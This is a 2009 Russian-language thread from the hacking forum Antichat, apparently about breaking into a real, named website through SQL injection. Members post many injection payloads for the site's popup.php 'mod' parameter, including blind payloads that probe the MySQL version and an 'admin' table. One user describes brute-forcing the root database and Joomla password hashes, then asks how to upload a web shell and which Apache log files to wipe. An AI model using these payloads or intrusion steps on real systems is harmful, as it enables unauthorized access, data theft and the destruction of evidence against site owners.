ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

28.10.2009, 17:51
|
|
Новичок
Регистрация: 10.12.2007
Сообщений: 11
Провел на форуме: 212520
Репутация:
1
|
|
.php?mod=1'union/**/select/**/1/* пустую страницу
а ты не пропустил ничего?
.php?mod=1'/**/union/**/select/**/1/* пустую страницу
|
|
|

28.10.2009, 18:01
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме: 224604
Репутация:
19
|
|
Сообщение от Op3r
.php?mod=1'union/**/select/**/1/* пустую страницу
а ты не пропустил ничего?
.php?mod=1'/**/union/**/select/**/1/* пустую страницу
Разницы никакой,пробовал...
|
|
|

28.10.2009, 18:12
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме: 950638
Репутация:
256
|
|
Сообщение от p.r0phe.t
Нашёл скул инъект.
на .php?mod=1' выдает обычную
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 1' at line 1
на .php?mod=1'union/**/select/**/1/* пустую страницу
на .php?mod=1'union/**/select/**/1,2, и т.д./* неверное количество полей
Это и есть слепая инъекция?Никогда раньше не работал с blind инъектами
Если да,то скажите пару слов про использование Bsqlbf или sqlmap
Реальный пример можно?  Хотя тут и по ошибке всё понятно...
|
|
|

28.10.2009, 18:14
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме: 224604
Репутация:
19
|
|
Сообщение от DrAssault
Реальный пример можно?  Хотя тут и по ошибке всё понятно...
http://apsite.ru/x/popup.php?mod=1'
P.S. а чё тут понятно? =)
|
|
|

28.10.2009, 18:16
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
p.r0phe.t
Я не понимаю, неужели нельзя сначала хоть что-то прочитать?
Что ты хочешь что-бы тебе тут ответили без линка и с такой информацией?
А вот так что выдаёт?
.php?mod=-1'/**/union/**/select/**/1/*
А вот так?
.php?mod=-1/**/union/**/select/**/1/*
А вот так?
.php?mod=1/**/union/**/select/**/1/*
А вот так?
.php?mod=1/**/union/**/select/**/1--+
А вот так?
.php?mod=-1/**/union/**/select/**/1--+
А вот так?
.php?mod=-1/**/and/**/1=1--+
А вот так?
.php?mod=-1/**/and/**/1=2--+
Продолжаем гадание, или почитаешь что-то? А может мы увидем линк?
|
|
|

28.10.2009, 18:17
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме: 224604
Репутация:
19
|
|
Сообщение от jokester
p.r0phe.t
Я не понимаю, неужели нельзя сначала хоть что-то прочитать?
Что ты хочешь что-бы тебе тут ответили без линка и с такой информацией?
А вот так что выдаёт?
.php?mod=-1'/**/union/**/select/**/1/*
А вот так?
.php?mod=-1/**/union/**/select/**/1/*
А вот так?
.php?mod=1/**/union/**/select/**/1/*
А вот так?
.php?mod=1/**/union/**/select/**/1--+
А вот так?
.php?mod=-1/**/union/**/select/**/1--+
А вот так?
.php?mod=-1/**/and/**/1=1--+
А вот так?
.php?mod=-1/**/and/**/1=2--+
Продолжаем гадание, или почитаешь что-то? А может мы увидем линк?
^
^
^
^
|
|
|

28.10.2009, 18:35
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме: 791766
Репутация:
61
|
|
Сообщение от DimOnOID
еслиб register_globals=On оно бы передалось в любом случае..а значит никак.
А разве я не могу взять другую html`ку на саете, переправить под форму создания юзера и вызову функцию?
|
|
|

28.10.2009, 18:55
|
|
Новичок
Регистрация: 10.12.2007
Сообщений: 11
Провел на форуме: 212520
Репутация:
1
|
|
как себя обезопасить после проведения Sql inj.
известно:
система: Apache/2.2.6 (FreeBSD) mod_ssl/2.2.6 OpenSSL/0.9.8e DAV/2 PHP/5.2.9 with Suhosin-Patch
version(): 5.1.22-rc-log
есть login и хеш пароль roota к БД бручу... пока безуспешно.
там висит JOOMLA пасс тоже пока в бруте.
как залить шелл после того как я узнаю пасс?
логи чистить эти?
/var/log/httpd-error.log
/var/log/httpd-access.log
какие дальше действия?
|
|
|

28.10.2009, 19:03
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме: 1957988
Репутация:
739
|
|
Скуль от какого юзера бд? МОжет через неё легче прочитать пасс root'а где-нить в конфигах чем брутить.
|
|
|

28.10.2009, 19:10
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
p.r0phe.t
4 ветка, фильтрация пробелов, "+", "=".
file_priv=n
Если очень-очень нужно, то можно:
http://apsite.ru/x/popup.php?mod=1'/**/or/**/if(substring(version(),1,1)/**/like/**/4,1,(select/**/1/**/union/**/select/**/2))/*
подбираем таблицу:
http://apsite.ru/x/popup.php?mod=1'/**/or/**/if((select/**/1/**/from/**/admin),1,(select/**/1/**/union/**/select/**/2))/*
и дальше в этом-же ключе :
http://forum.antichat.ru/threadnav35207-1-10.html
Отличный способ от скуки 
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|